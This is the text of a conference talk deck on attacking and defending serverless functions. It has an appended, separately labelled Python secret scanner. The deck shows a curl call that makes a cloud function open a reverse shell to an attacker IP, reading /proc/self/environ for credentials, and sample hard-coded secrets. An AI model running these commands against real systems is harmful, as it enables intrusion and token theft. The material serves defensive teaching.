SESSION ID: CSV-T12
Defending Serverless Infrastructure in the Cloud
Eric Johnson
Principal Security Engineer, Puma Security
Principal Instructor, SANS Institute
www.linkedin.com/in/eric-m-johnson
@emjohn20
#RSAC

Cloud Serverless Infrastructure
Functions as a Service (FaaS) managed infrastructure offerings across the Big 3 cloud providers:
- AWS Lambda
- Azure Functions
- GCP Functions

Goals For This Session
- Reverse engineer the serverless execution environment
- Discover insecurely stored function secrets
- Exfiltrate authentication tokens from the serverless container
- Detect stolen authentication tokens accessing cloud resources
- Apply network controls to prevent command and control
- Leverage audit logging and monitoring to detect malicious activity

Function Execution Environment
Defending Serverless Infrastructure in the Cloud

Function Execution Environment
Understanding the attacker's view of a serverless execution environment helps prioritize defenses:
- What user is executing the function?
- What operating system (OS) is running the function?
- What is the default directory?
- Where is the source code?
- What environment variables exist?
- Where are the service account creds / authentication tokens?
- What directories are writable?

Puma Security: Serverless Prey
Serverless Prey is an open source repository containing:
- Functions to establish a reverse shell in each cloud
  - Cheetah: Google Function
  - Cougar: Azure Function
  - Panther: AWS Lambda
- Code and documentation to reproduce information presented in this session
https://github.com/pumasecurity/serverless-prey

Establishing The Function Reverse Shell
(Diagram labels: Function Invocation, Reverse Shell)
Create the connection back to the attacker's server:

  $ curl "https://uscentral1-precise-works123456.cloudfunctions.net/cheetah?host=13.58.4.216&port=1042"

Attacker's server waits for the incoming connections and issues commands:
(Screenshot of the listener not recoverable from the extracted text.)

Serverless Execution Environment
Reverse engineering each function's execution environment:

  Function        OS                   Directory    User
  NodeJS 12       Amazon Linux 2       /var/task    sbx_user1051
  .NET Core 3.1   Debian GNU/Linux 9   /            app
  Go 1.11         Ubuntu 18.04.2 LTS   /srv/files   root

Default Function Execution Networking
- Configurable triggers from HTTP or API Gateway events
- Routing allows Internet egress traffic and responses
- Routing allows egress traffic and responses to public cloud service APIs
(Diagram labels: Virtual Private Cloud, Internet, Public Subnet, Internet Gateway, Cloud, Private Subnet, Function, Storage, Secrets)

Secrets Management
Defending Serverless Infrastructure in the Cloud

Serverless Secrets Management Options
Options for managing secrets in cloud functions:
- Hard-code in source code
- Deploy a configuration file in the function's deployment package
- Pass secrets into the runtime as environment variables
- Read secrets from cloud key management service (KMS) or secrets manager

Serverless Secrets: Where is the Source Code?
Start by looking for secrets in the function source code:

  AWS Lambda        /var/task
  Azure Functions   /home/site/wwwroot/
  GCP Functions     /srv/files

GCP Function: Source Code Example
Inspecting the GCP Function deployment package:

  $ ls -la /srv/files
  total 167
  -rw-r--r-- 1 root root  268 Jan  3 16:49 Makefile
  -rw-r--r-- 1 root root 1898 Jan  3 16:49 cheetah.go
  -rw-r--r-- 1 root root  178 Jan  3 16:49 cheetah.yaml
  -rw-r--r-- 1 root root  170 Jan  3 16:49 go.mod
  -rw-r--r-- 1 root root 1798 Jan  3 16:49 go.sum
  -rw-r--r-- 1 root root  939 Jan  3 16:49 package.json
  -rw-r--r-- 1 root root  710 Jan  3 16:49 serverless.yml

GCP Function: Configuration File Example
Dumping the Go function's configuration data:

  $ cat /srv/files/cheetah.yaml
  # Server configurations
  server:
    host: "10.42.42.42"
    port: 8000

  # Database credentials
  database:
    user: "cheetah_user"
    pass: "QnV0IHVuaWNvcm5zIGFwcGFyZW50bHkgZG8gZXhpc3Qu"

Azure Function: Environment Variable Example
Environment variables can be accessed by remote attackers using local file inclusion or command injection vulnerabilities:

  $ cat /proc/self/environ
  WEBSITE_AUTH_ENCRYPTION_KEY=BBDAD8269958635C8D4E3C713636D
  APPSETTING_AzureWebJobsStorage=6BZ4kOCoSD7T1fc8v4h8JpRg==
  APPSETTING_APPINSIGHTS_INSTRUMENTATIONKEY=5D17A234-6B814777-8528-6814374E9BD3
  MSI_SECRET=A788C6DE68224140A927BB412B4E24AB
  AzureWebEncryptionKey=BBDAD80
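The configuration-file and environment-variable examples above both show secrets that anyone who can read the execution environment can recover. The following pre-deployment check is an added example, not code from the talk or from the Serverless Prey repository: it flags credential-looking keys in the package's config files and in /proc/self/environ-style data. The key-name hints, the entropy threshold and the sample inputs are assumptions constructed for this example.

```python
import math
import re
from collections import Counter

# Assumed heuristics: credential-like key names, or long high-entropy values.
KEY_VALUE_RE = re.compile(r"^\s*([A-Za-z_][\w.-]*)\s*[:=]\s*['\"]?([^'\"#\n]+?)['\"]?\s*$")
SECRET_HINTS = ("pass", "secret", "token", "key", "credential")

# Constructed sample inputs: a package modelled on the deck's cheetah.yaml, a
# serverless.yml that hands a secret to the runtime as an environment variable,
# and a NUL-separated environ byte string in the /proc/self/environ format.
SAMPLE_PACKAGE = {
    "cheetah.yaml": '# Server configurations\nserver:\n  host: "10.42.42.42"\n  port: 8000\n'
                    '\n# Database credentials\ndatabase:\n  user: "cheetah_user"\n'
                    '  pass: "QnV0IHVuaWNvcm5zIGFwcGFyZW50bHkgZG8gZXhpc3Qu"\n',
    "serverless.yml": "service: cheetah\nprovider:\n  environment:\n"
                      "    DB_PASSWORD: hunter2\n    LOG_LEVEL: info\n",
}
SAMPLE_ENVIRON = (b"WEBSITE_AUTH_ENCRYPTION_KEY=0123456789ABCDEF\x00PATH=/usr/bin\x00"
                  b"MSI_SECRET=CONSTRUCTED-VALUE\x00HOME=/home/app\x00")

def shannon_entropy(value: str) -> float:
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in Counter(value).values())

def looks_secret(name: str, value: str) -> bool:
    named = any(h in name.lower() for h in SECRET_HINTS)
    return named or (len(value) >= 20 and shannon_entropy(value) > 3.5)

def scan_package(files, exts=(".yaml", ".yml", ".json", ".env")):
    # files: {path: text} unpacked from the package (/srv/files, /var/task, ...);
    # returns (path, line number, key) for every hard-coded secret found.
    findings = []
    for path, text in sorted(files.items()):
        if not path.endswith(exts):
            continue  # source files are out of scope for this config scan
        for lineno, line in enumerate(text.splitlines(), 1):
            m = KEY_VALUE_RE.match(line)
            if m and looks_secret(m.group(1), m.group(2)):
                findings.append((path, lineno, m.group(1)))
    return findings

def scan_environ(raw: bytes):
    # Parse NUL-separated KEY=VALUE data; return names whose name or value looks secret.
    hits = []
    for entry in raw.split(b"\x00"):
        if b"=" in entry:
            name, value = entry.decode("utf-8", "replace").split("=", 1)
            if looks_secret(name, value):
                hits.append(name)
    return hits
```

Run this against an unpacked deployment package in CI before the function is published; the entropy rule also catches secrets stored under innocuous key names.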

PDF document: 2020_USA20_CSV-T12_01_Defending Serverless Infrastructure in the Cloud

This document was uploaded and shared by 张玉竹 on 2022-04-08 10:19:27.